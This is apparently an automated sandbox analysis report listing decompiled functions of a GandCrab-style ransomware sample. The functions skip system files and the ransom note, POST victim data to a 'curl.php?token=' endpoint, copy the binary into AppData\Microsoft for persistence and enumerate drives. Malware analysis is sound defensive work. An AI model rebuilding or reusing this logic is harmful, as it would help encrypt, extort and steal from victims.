                                      							_t45 = VirtualAlloc(0, 0x2800, 0x3000, 4);
                                      							if(_t45 == 0) {
                                      								lstrcpyA(_t43, "fabian wosar <3");
                                      								return 0;
                                      							} else {
                                      								wsprintfW(_t45,  &_v76, _t37);
                                      								E00404B10(_t45);
                                      								E00404CB0(_t37, _t43, _t37, _t43, _t45);
                                      								VirtualFree(_t45, 0, 0x8000);
                                      								return 0;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					L1:
                                      					return _t24 | 0xffffffff;
                                      				}
                                      			}


























                                      0x00404d6b
                                      0x00404d73
                                      0x00404d77
                                      0x00404d79
                                      0x00404d7c
                                      0x00404d81
                                      0x00404d93
                                      0x00404d9a
                                      0x00404da1
                                      0x00404da8
                                      0x00404daf
                                      0x00404db6
                                      0x00404dbd
                                      0x00404dc4
                                      0x00404dcb
                                      0x00404dd2
                                      0x00404dd9
                                      0x00404de0
                                      0x00404de7
                                      0x00404dee
                                      0x00404df5
                                      0x00404dfd
                                      0x00404e19
                                      0x00404e1d
                                      0x00000000
                                      0x00404e1f
                                      0x00404e2f
                                      0x00404e3f
                                      0x00404e43
                                      0x00000000
                                      0x00404e45
                                      0x00404e59
                                      0x00404e5d
                                      0x00404e9b
                                      0x00404ea9
                                      0x00404e5f
                                      0x00404e65
                                      0x00404e70
                                      0x00404e79
                                      0x00404e86
                                      0x00404e94
                                      0x00404e94
                                      0x00404e5d
                                      0x00404e43
                                      0x00404dff
                                      0x00404dff
                                      0x00404e08
                                      0x00404e08

                                      APIs
                                      • CreatePipe.KERNEL32(00412B10,00412B0C,?,00000000,00000000,00000001,00000000), ref: 00404DF5
                                      • SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E19
                                      • CreatePipe.KERNEL32(00412B08,00412B14,0000000C,00000000), ref: 00404E2F
                                      • SetHandleInformation.KERNEL32(00000001,00000000), ref: 00404E3F
                                      • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00404E53
                                      • wsprintfW.USER32 ref: 00404E65
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404E86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                      • String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
                                      • API String ID: 1490407255-783179298
                                      • Opcode ID: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
                                      • Instruction ID: 87b3df06f302a376c278e654a4a7d1f30e625f23b6bcd530246e45e208265c66
                                      • Opcode Fuzzy Hash: 5b63822ef074579cd001efa140b9789c7fd5fb445f6afd0b1fdc3c768e3f9d6f
                                      • Instruction Fuzzy Hash: FB31D8B1B01308ABEB109F95AD49BEE7FB5FB44714F104036E604F62D1D7F559448BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00406240(WCHAR* __ecx) {
                                      				int _t4;
                                      				signed int _t5;
                                      				signed int _t15;
                                      				void* _t19;
                                      				WCHAR* _t21;
                                      				short* _t25;
                                      				WCHAR* _t26;
                                      
                                      				_t21 = __ecx;
                                      				_t4 = lstrlenW(__ecx);
                                      				_t5 = lstrlenW(_t21);
                                      				_t1 = _t21 - 2; // -2
                                      				_t25 = _t1 + _t5 * 2;
                                      				_t19 = _t4 - 1;
                                      				if(_t19 != 0) {
                                      					do {
                                      						_t25 = _t25 - 2;
                                      						_t19 = _t19 - 1;
                                      					} while ( *_t25 != 0x5c && _t19 != 0);
                                      				}
                                      				_t26 = _t25 + 2;
                                      				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
                                      					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
                                      						goto L5;
                                      					} else {
                                      						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
                                      						asm("sbb eax, eax");
                                      						return  ~_t15 + 1;
                                      					}
                                      				} else {
                                      					L5:
                                      					return 1;
                                      				}
                                      			}










                                      0x00406249
                                      0x0040624c
                                      0x00406251
                                      0x00406253
                                      0x00406256
                                      0x00406259
                                      0x0040625a
                                      0x00406260
                                      0x00406260
                                      0x00406263
                                      0x00406264
                                      0x00406260
                                      0x00406274
                                      0x00406281
                                      0x00406296
                                      0x00000000
                                      0x004062e0
                                      0x004062e6
                                      0x004062eb
                                      0x004062f0
                                      0x004062f0
                                      0x00406285
                                      0x00406285
                                      0x0040628b
                                      0x0040628b

                                      APIs
                                      • lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00406403), ref: 0040624C
                                      • lstrlenW.KERNEL32(00000000), ref: 00406251
                                      • lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0040627D
                                      • lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00406292
                                      • lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0040629E
                                      • lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 004062AA
                                      • lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 004062B6
                                      • lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 004062C2
                                      • lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 004062CE
                                      • lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 004062DA
                                      • lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 004062E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcmpi$lstrlen
                                      • String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
                                      • API String ID: 203586893-634406045
                                      • Opcode ID: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
                                      • Instruction ID: 048d6f8e0bde4782f578bbb55f50fa0ba415c8db6f5f272e4d17ab509b81b6c5
                                      • Opcode Fuzzy Hash: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
                                      • Instruction Fuzzy Hash: 3D11546264262A2ADA6072799C05EEB129C4D91F5031603BBFC05F21C4DFFDDEA285BD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 35%
                                      			E00405370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
                                      				CHAR* _v12;
                                      				void* _v16;
                                      				CHAR** _v20;
                                      				void* _v24;
                                      				void* _v28;
                                      				void* _v32;
                                      				char _v36;
                                      				short _v136;
                                      				char _v1156;
                                      				short _v1160;
                                      				int _t45;
                                      				void* _t53;
                                      				CHAR* _t57;
                                      				CHAR* _t59;
                                      				CHAR* _t60;
                                      				void* _t61;
                                      				void* _t70;
                                      				short _t71;
                                      
                                      				_t59 = __ecx;
                                      				_v20 = __edx;
                                      				_v12 = __ecx;
                                      				E004077F0( &_v36);
                                      				_v24 = E00404EB0();
                                      				_t70 = 0x400 + lstrlenA(_t59) * 2;
                                      				_t7 = _t70 + 1; // 0x74cb6981
                                      				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
                                      				_v28 = _t60;
                                      				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                      				if(_t60 == 0) {
                                      					L2:
                                      					_t60 = 0;
                                      					L3:
                                      					lstrcatA(_t60, "data=");
                                      					lstrcatA(_t60, _v12);
                                      					asm("movdqu xmm0, [0x40ffd0]");
                                      					asm("movdqu [ebp-0x84], xmm0");
                                      					asm("movdqu xmm0, [0x40ffe0]");
                                      					asm("movdqu [ebp-0x74], xmm0");
                                      					asm("movdqu xmm0, [0x40fff0]");
                                      					asm("movdqu [ebp-0x64], xmm0");
                                      					asm("movdqu xmm0, [0x410000]");
                                      					asm("movdqu [ebp-0x54], xmm0");
                                      					asm("movdqu xmm0, [0x410010]");
                                      					asm("movdqu [ebp-0x44], xmm0");
                                      					asm("movdqu xmm0, [0x410020]");
                                      					asm("movdqu [ebp-0x34], xmm0");
                                      					lstrlenA(_t60);
                                      					_t71 = 0;
                                      					_v1160 = 0;
                                      					E00408B30( &_v1156, 0, 0x3fc);
                                      					lstrcpyW( &_v1160, L"curl.php?token=");
                                      					E00405270( &_v1160);
                                      					_t45 = lstrlenW( &_v136);
                                      					_t74 = _v16;
                                      					_push(_t45);
                                      					_push( &_v136);
                                      					_push(L"POST");
                                      					_push(0x31fff);
                                      					_push(_v16);
                                      					_push(lstrlenA(_t60));
                                      					_push(_t60);
                                      					_t61 = _v24;
                                      					_push( &_v1160);
                                      					_push(_t61);
                                      					if(E00407A00( &_v36) != 0) {
                                      						_t71 = 1;
                                      						if(_a4 != 0) {
                                      							_v12 = 0;
                                      							if(E00405050(_t74,  &_v12) == 0) {
                                      								_t71 = 0;
                                      							} else {
                                      								_t57 = _v12;
                                      								if(_t57 != 0) {
                                      									 *_v20 = _t57;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					VirtualFree(_t61, 0, 0x8000);
                                      					VirtualFree(_v16, 0, 0x8000);
                                      					VirtualFree(_v28, 0, 0x8000);
                                      					_t53 = _v32;
                                      					if(_t53 != 0) {
                                      						InternetCloseHandle(_t53);
                                      					}
                                      					return _t71;
                                      				}
                                      				_t10 = _t70 + 1; // 0x74cb6981
                                      				if(_t70 < _t10) {
                                      					goto L3;
                                      				}
                                      				goto L2;
                                      			}





















                                      0x0040537b
                                      0x0040537d
                                      0x00405384
                                      0x00405387
                                      0x00405392
                                      0x004053a8
                                      0x004053af
                                      0x004053c3
                                      0x004053c7
                                      0x004053cc
                                      0x004053d1
                                      0x004053da
                                      0x004053da
                                      0x004053dc
                                      0x004053e8
                                      0x004053ee
                                      0x004053f0
                                      0x004053f9
                                      0x00405401
                                      0x00405409
                                      0x0040540e
                                      0x00405416
                                      0x0040541b
                                      0x00405423
                                      0x00405428
                                      0x00405430
                                      0x00405435
                                      0x0040543d
                                      0x00405442
                                      0x00405448
                                      0x00405457
                                      0x0040545d
                                      0x00405471
                                      0x0040547d
                                      0x00405489
                                      0x0040548f
                                      0x00405492
                                      0x00405499
                                      0x0040549a
                                      0x004054a2
                                      0x004054a7
                                      0x004054af
                                      0x004054b0
                                      0x004054b1
                                      0x004054ba
                                      0x004054bb
                                      0x004054c6
                                      0x004054cc
                                      0x004054d1
                                      0x004054d6
                                      0x004054e6
                                      0x004054f6
                                      0x004054e8
                                      0x004054e8
                                      0x004054ed
                                      0x004054f2
                                      0x004054f2
                                      0x004054ed
                                      0x004054e6
                                      0x004054d1
                                      0x00405506
                                      0x00405512
                                      0x0040551e
                                      0x00405520
                                      0x00405525
                                      0x00405528
                                      0x00405528
                                      0x00405536
                                      0x00405536
                                      0x004053d3
                                      0x004053d8
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      APIs
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                        • Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 00404F22
                                        • Part of subcall function 00404EB0: Sleep.KERNEL32(00002710), ref: 00404F4C
                                        • Part of subcall function 00404EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00404F5A
                                        • Part of subcall function 00404EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00404F6A
                                        • Part of subcall function 00404EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00404F7E
                                        • Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404F8F
                                        • Part of subcall function 00404EB0: wsprintfW.USER32 ref: 00404FA7
                                        • Part of subcall function 00404EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00404FB8
                                      • lstrlenA.KERNEL32(00000000,74CB6980,00000000,00000000), ref: 00405395
                                      • VirtualAlloc.KERNEL32(00000000,74CB6981,00003000,00000040), ref: 004053B5
                                      • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 004053CA
                                      • lstrcatA.KERNEL32(00000000,data=), ref: 004053E8
                                      • lstrcatA.KERNEL32(00000000,004056FE), ref: 004053EE
                                      • lstrlenA.KERNEL32(00000000), ref: 00405442
                                      • _memset.LIBCMT ref: 0040545D
                                      • lstrcpyW.KERNEL32 ref: 00405471
                                      • lstrlenW.KERNEL32(?), ref: 00405489
                                      • lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 004054A9
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00405506
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00405512
                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 0040551E
                                      • InternetCloseHandle.WININET(?), ref: 00405528
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
                                      • String ID: POST$curl.php?token=$data=
                                      • API String ID: 186108914-1715678351
                                      • Opcode ID: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
                                      • Instruction ID: 4aa36092560c0acaf7b062926e9d70cdf9a0aa4eca25d73af60562301bb62425
                                      • Opcode Fuzzy Hash: 5eba2a68d1ef90ccaff39bd68a776efbf0a530b61a350863102a495147ee2029
                                      • Instruction Fuzzy Hash: 54519671E0031A66DB109BA5DD45FEEBB7CFB48300F104176FA44B6191DB786A44CB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E00402AD0() {
                                      				short _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				short _v20;
                                      				WCHAR* _v24;
                                      				WCHAR* _v28;
                                      				long _v32;
                                      				intOrPtr _v36;
                                      				WCHAR* _t24;
                                      				void* _t27;
                                      				WCHAR* _t33;
                                      				WCHAR* _t38;
                                      				signed int _t40;
                                      				signed int _t46;
                                      				WCHAR* _t50;
                                      				WCHAR* _t54;
                                      				void* _t56;
                                      				WCHAR* _t57;
                                      				void* _t58;
                                      				WCHAR* _t64;
                                      				WCHAR* _t65;
                                      				WCHAR* _t67;
                                      				signed int _t69;
                                      				void* _t71;
                                      				void* _t72;
                                      
                                      				_t71 = (_t69 & 0xfffffff8) - 0x1c;
                                      				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40);
                                      				_v24 = _t24;
                                      				_t64 = _t24;
                                      				_v32 = 0;
                                      				if(_t24 == 0) {
                                      					_t67 = 0;
                                      					_t50 = 0;
                                      					__eflags = 0;
                                      				} else {
                                      					_t3 =  &(_t24[0x101]); // 0x202
                                      					_t65 = _t3;
                                      					_v32 = 0x404;
                                      					_t50 = _t65;
                                      					_t67 = _t24;
                                      					_t64 =  &(_t65[0x101]);
                                      				}
                                      				_v28 = _t67;
                                      				GetModuleFileNameW(0, _t67, 0x100);
                                      				GetTempPathW(0x100, _t50);
                                      				_t6 =  &(_t50[1]); // 0x204
                                      				_t27 = E00407BA0(_t67, _t6);
                                      				_t75 = _t27;
                                      				if(_t27 == 0) {
                                      					_v20 = 0x520050;
                                      					_v8 = 0;
                                      					_push(0x52);
                                      					_v16 = 0x440049;
                                      					_v12 = 0x520055;
                                      					E00407C60( &_v20, lstrlenW( &_v20));
                                      					_t72 = _t71 + 4;
                                      					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
                                      					_t13 =  &(_t50[1]); // 0x2
                                      					_t54 = _t67;
                                      					_t33 = E00407BA0(_t54, _t13);
                                      					__eflags = _t33;
                                      					if(_t33 == 0) {
                                      						lstrcatW(_t50, L"\\Microsoft\\");
                                      						lstrcatW(_t50,  &_v20);
                                      						lstrcatW(_t50, L".exe");
                                      						_push(_t54);
                                      						_t38 = E00402890(_v28, _t50);
                                      						_t72 = _t72 + 4;
                                      						__eflags = _t38;
                                      						if(_t38 == 0) {
                                      							goto L17;
                                      						}
                                      						_t40 = lstrlenW(_t50);
                                      						__eflags = _v28;
                                      						_t56 = 0xa + _t40 * 2;
                                      						if(_v28 == 0) {
                                      							L13:
                                      							_t64 = 0;
                                      							__eflags = 0;
                                      							L14:
                                      							_push(_t50);
                                      							L15:
                                      							wsprintfW(_t64, L"\"%s\"");
                                      							_t57 = _t64;
                                      							goto L16;
                                      						}
                                      						__eflags = _v36 + _t56 - 0x800;
                                      						if(__eflags < 0) {
                                      							goto L14;
                                      						}
                                      						goto L13;
                                      					}
                                      					_t46 = lstrlenW(_t67);
                                      					__eflags = _v28;
                                      					_t58 = 0xa + _t46 * 2;
                                      					if(_v28 == 0) {
                                      						L8:
                                      						_t64 = 0;
                                      						__eflags = 0;
                                      						L9:
                                      						_push(_t67);
                                      						goto L15;
                                      					}
                                      					__eflags = _v36 + _t58 - 0x800;
                                      					if(__eflags < 0) {
                                      						goto L9;
                                      					}
                                      					goto L8;
                                      				} else {
                                      					_t57 = _t67;
                                      					L16:
                                      					E00402960(_t57, _t75);
                                      					L17:
                                      					ExitThread(0);
                                      				}
                                      			}




























                                      0x00402ad6
                                      0x00402aea
                                      0x00402af0
                                      0x00402af4
                                      0x00402af6
                                      0x00402b00
                                      0x00402b1c
                                      0x00402b1e
                                      0x00402b1e
                                      0x00402b02
                                      0x00402b02
                                      0x00402b02
                                      0x00402b08
                                      0x00402b10
                                      0x00402b12
                                      0x00402b14
                                      0x00402b14
                                      0x00402b28
                                      0x00402b2c
                                      0x00402b38
                                      0x00402b3e
                                      0x00402b43
                                      0x00402b48
                                      0x00402b4a
                                      0x00402b55
                                      0x00402b62
                                      0x00402b67
                                      0x00402b6c
                                      0x00402b75
                                      0x00402b89
                                      0x00402b8e
                                      0x00402b9c
                                      0x00402ba2
                                      0x00402ba5
                                      0x00402ba7
                                      0x00402bac
                                      0x00402bae
                                      0x00402be4
                                      0x00402bec
                                      0x00402bf4
                                      0x00402bf6
                                      0x00402bfd
                                      0x00402c02
                                      0x00402c05
                                      0x00402c07
                                      0x00000000
                                      0x00000000
                                      0x00402c0f
                                      0x00402c11
                                      0x00402c16
                                      0x00402c1d
                                      0x00402c2c
                                      0x00402c2c
                                      0x00402c2c
                                      0x00402c2e
                                      0x00402c2e
                                      0x00402c2f
                                      0x00402c35
                                      0x00402c3b
                                      0x00000000
                                      0x00402c3d
                                      0x00402c25
                                      0x00402c2a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402c2a
                                      0x00402bb6
                                      0x00402bb8
                                      0x00402bbd
                                      0x00402bc4
                                      0x00402bd3
                                      0x00402bd3
                                      0x00402bd3
                                      0x00402bd5
                                      0x00402bd5
                                      0x00000000
                                      0x00402bd5
                                      0x00402bcc
                                      0x00402bd1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00402b4c
                                      0x00402b4c
                                      0x00402c40
                                      0x00402c40
                                      0x00402c45
                                      0x00402c47
                                      0x00402c47

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00402AEA
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00402B2C
                                      • GetTempPathW.KERNEL32(00000100,00000000), ref: 00402B38
                                      • lstrlenW.KERNEL32(?,?,?,00000052), ref: 00402B7D
                                        • Part of subcall function 00407C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                        • Part of subcall function 00407C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                        • Part of subcall function 00407C60: GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                        • Part of subcall function 00407C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                        • Part of subcall function 00407C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                        • Part of subcall function 00407C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                        • Part of subcall function 00407C60: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
                                      • GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00402B9C
                                      • lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00402BE4
                                      • lstrcatW.KERNEL32(00000000,?), ref: 00402BEC
                                      • lstrcatW.KERNEL32(00000000,.exe), ref: 00402BF4
                                      • wsprintfW.USER32 ref: 00402C35
                                      • ExitThread.KERNEL32 ref: 00402C47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
                                      • String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
                                      • API String ID: 139215849-2398311915
                                      • Opcode ID: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
                                      • Instruction ID: 1f7025583fece4150ab6efb2fb4095bab450847bdb3333ccf3c22af7b910d208
                                      • Opcode Fuzzy Hash: 8f2a0bd0de482528f1caf89761174d1ff230737b866bf32f99a3677a47c9b2f2
                                      • Instruction Fuzzy Hash: 0841A771204311ABE304EF219E4DB5F77A8AF84704F04443EB555B62D2DBB8A908CBAF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 89%
                                      			E00407369(signed int __eax, intOrPtr __edx, void* __esi) {
                                      				signed int _t51;
                                      				signed int _t56;
                                      				void* _t58;
                                      				long _t59;
                                      				void* _t75;
                                      				signed int _t77;
                                      				signed int _t80;
                                      				intOrPtr _t85;
                                      				WCHAR* _t88;
                                      				intOrPtr _t93;
                                      				signed int _t95;
                                      				intOrPtr _t100;
                                      				void* _t102;
                                      				void* _t104;
                                      				void* _t106;
                                      
                                      				_t102 = __esi;
                                      				_t93 = __edx;
                                      				_t51 = __eax;
                                      				do {
                                      					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
                                      					_t95 = GetDriveTypeW(_t104 - 0x24);
                                      					if(_t95 <= 2 || _t95 == 5) {
                                      						L6:
                                      					} else {
                                      						 *((short*)(_t104 - 0x20)) = 0;
                                      						lstrcatW( *(_t102 + 0x7c), _t104 - 0x24);
                                      						 *((short*)(_t104 - 0x20)) = 0x5c;
                                      						lstrcatW( *(_t102 + 0x7c),  *(_t104 + _t95 * 4 - 0x40));
                                      						lstrcatW( *(_t102 + 0x7c), "_");
                                      						if(GetDiskFreeSpaceW(_t104 - 0x24, _t104 - 0x1c, _t104 - 0x14, _t104 - 0xc, _t104 - 0x10) == 0) {
                                      							lstrcatW( *(_t102 + 0x7c), L"0,");
                                      							goto L6;
                                      						} else {
                                      							 *((intOrPtr*)(_t104 - 8)) = E00408470( *(_t104 - 0x10), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
                                      							_t85 = _t93;
                                      							_t75 = E00408470( *(_t104 - 0xc), 0,  *(_t104 - 0x1c) *  *(_t104 - 0x14), 0);
                                      							_t100 =  *((intOrPtr*)(_t104 - 8));
                                      							 *((intOrPtr*)(_t104 - 4)) = _t100 - _t75;
                                      							asm("sbb eax, edx");
                                      							 *((intOrPtr*)(_t104 - 8)) = _t85;
                                      							_t77 = lstrlenW( *(_t102 + 0x7c));
                                      							_push(_t85);
                                      							wsprintfW( &(( *(_t102 + 0x7c))[_t77]), L"%I64u/", _t100);
                                      							_t80 = lstrlenW( *(_t102 + 0x7c));
                                      							_push( *((intOrPtr*)(_t104 - 8)));
                                      							wsprintfW( &(( *(_t102 + 0x7c))[_t80]), L"%I64u",  *((intOrPtr*)(_t104 - 4)));
                                      							_t106 = _t106 + 0x20;
                                      							lstrcatW( *(_t102 + 0x7c), ",");
                                      						}
                                      					}
                                      					_t51 =  *(_t104 - 0x18) + 1;
                                      					 *(_t104 - 0x18) = _t51;
                                      				} while (_t51 < 0x1b);
                                      				_t56 = lstrlenW( *(_t102 + 0x7c));
                                      				_t88 =  *(_t102 + 0x7c);
                                      				 *((short*)(_t88 + _t56 * 2 - 2)) = 0;
                                      				if( *(_t102 + 0x80) != 0) {
                                      					_t58 = VirtualAlloc(0, 0x81, 0x3000, 4);
                                      					 *(_t102 + 0x84) = _t58;
                                      					if(_t58 == 0) {
                                      						L13:
                                      						 *(_t102 + 0x80) = 0;
                                      					} else {
                                      						_push(_t88);
                                      						_t59 = E004068F0(_t58);
                                      						if(_t59 == 0) {
                                      							VirtualFree( *(_t102 + 0x84), _t59, 0x8000);
                                      							goto L13;
                                      						}
                                      					}
                                      				}
                                      				return 1;
                                      			}


















                                      0x00407369
                                      0x00407369
                                      0x00407369
                                      0x00407370
                                      0x00407375
                                      0x00407383
                                      0x00407388
                                      0x0040747b
                                      0x00407397
                                      0x00407399
                                      0x004073a4
                                      0x004073b2
                                      0x004073b6
                                      0x004073c0
                                      0x004073de
                                      0x00407479
                                      0x00000000
                                      0x004073e4
                                      0x00407400
                                      0x00407403
                                      0x00407405
                                      0x0040740a
                                      0x00407416
                                      0x00407419
                                      0x0040741b
                                      0x0040741e
                                      0x00407427
                                      0x00407438
                                      0x00407446
                                      0x00407448
                                      0x0040745a
                                      0x00407462
                                      0x0040746d
                                      0x0040746d
                                      0x004073de
                                      0x00407484
                                      0x00407485
                                      0x00407488
                                      0x00407494
                                      0x00407496
                                      0x0040749b
                                      0x004074a7
                                      0x004074b7
                                      0x004074bd
                                      0x004074c5
                                      0x004074e4
                                      0x004074e4
                                      0x004074c7
                                      0x004074c7
                                      0x004074c9
                                      0x004074d0
                                      0x004074de
                                      0x00000000
                                      0x004074de
                                      0x004074d0
                                      0x004074c5
                                      0x004074f9

                                      APIs
                                      • GetDriveTypeW.KERNEL32(?), ref: 0040737D
                                      • lstrcatW.KERNEL32(?,?), ref: 004073A4
                                      • lstrcatW.KERNEL32(?,0041073C), ref: 004073B6
                                      • lstrcatW.KERNEL32(?,004107B0), ref: 004073C0
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00404590), ref: 004073D6
                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00404590,00000000,?,00000000), ref: 0040741E
